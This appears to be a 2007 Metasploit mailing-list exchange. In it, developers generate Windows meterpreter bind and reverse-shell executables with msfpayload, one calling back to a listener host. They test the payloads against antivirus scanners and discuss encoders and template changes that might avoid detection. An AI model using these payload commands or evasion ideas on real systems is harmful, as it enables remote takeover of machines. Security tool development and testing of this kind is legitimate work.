Connect to a remote windows host with valid credentials (no exploit)

[mmiller at hick.org (mmiller at hick.org)]

On Fri, Jun 01, 2007 at 03:13:01PM -0500, Kurt Grutzmacher wrote:
> On Fri, Jun 01, 2007 at 04:50:23PM +0200, Nicolas FR wrote:
> > - Kaspersky 6.0 detects the payload and blocks the .exe when the exploit is
> > launched (warning about "Buffer Overflow"); Kaspersky does a good job on
> > this, I am positively surprised.
>
> I made a meterpreter listener and reverse and uploaded them to virustotal.com:
>
> $ ./msfpayload windows/meterpreter/bind_tcp LPORT=5512 X > metbind-5512.exe
> $ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.221.55.2 LPORT=5512 X > metreverse-5512.exe
>
> Only three found them suspicious, Fortinet 2.85.0.0, Panda 9.0.0.4 and
> Webwasher-Gateway 6.0.1 .. That could change in the future. Symantec 10
> used to complain, not sure what changed.  :)
>
> If only a clean EXE would be created with a real exit() call or
> something. Having the debug handler kick in after doing a 'quit' really
> sucks. 

I committed a change to trunk to allow you to specify an encoder through
the ENCODER option on the command line (case sensitive).  You might try
generating an executable using an encoder and see what AVs come back
with.  The only problem will be that a number of the encoders assume the
ability to do in-place decoding which won't work with the current
executable template (because the code section is readonly).  It might be
possible for us to modify the template to have the code section be
mapped execute/read/write.  I wonder if AV flags that as suspicious :)